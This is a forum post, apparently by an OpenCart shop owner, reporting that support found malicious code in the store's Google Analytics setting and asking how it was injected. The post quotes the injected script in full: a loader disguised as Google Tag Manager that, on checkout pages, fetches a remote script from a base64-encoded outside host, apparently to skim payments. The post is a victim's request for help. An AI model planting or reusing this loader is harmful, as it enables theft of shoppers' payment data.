Hello.
I know its difficult to help without saying what site is but those informations are sensitive you know .
I have contact Journal Support and they find the malicious code at Google Analytics (the following code is copy paste from the db)
Google-Analytics.png (356.53 KiB) Viewed 2270 times
Code: Select all
-- Google Tag Manager --> <script>(function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObjects\']=a;r=s.createElement (g),m=s.getElementsByTagName(g)[0];if(i.location.href.indexOf(i.atob(a)) >0){r.async=1;r.src=\'https://\'+i.atob(o);m.parentNode.insertBefore(r,m)}}) (window,document,\'YWh1YS5mZm94LnNpdGUvNmZjMWM5YTYvc3RhdC5waHA=\',\'script\',\'//www.google-analytics.com/analytics.js\', \'Y2hlY2tvdQ==\',\'ga\');</script> <!-- End Google Tag Manager -->',
The thing is how they get access to inject the code there !!
I am using the latest Journal Theme 3.1.8 and OC 3.0.3.6 as I said in the first post .
Opencart unfortunately dont have logs in details what comes in 3.0.3.7 so I dont know if they are solving any security issue .
I have compare almost all my extensions OC and Journal with default installations and I was unable to trace something .
So I guess its hard to trace to security hole .
Thanks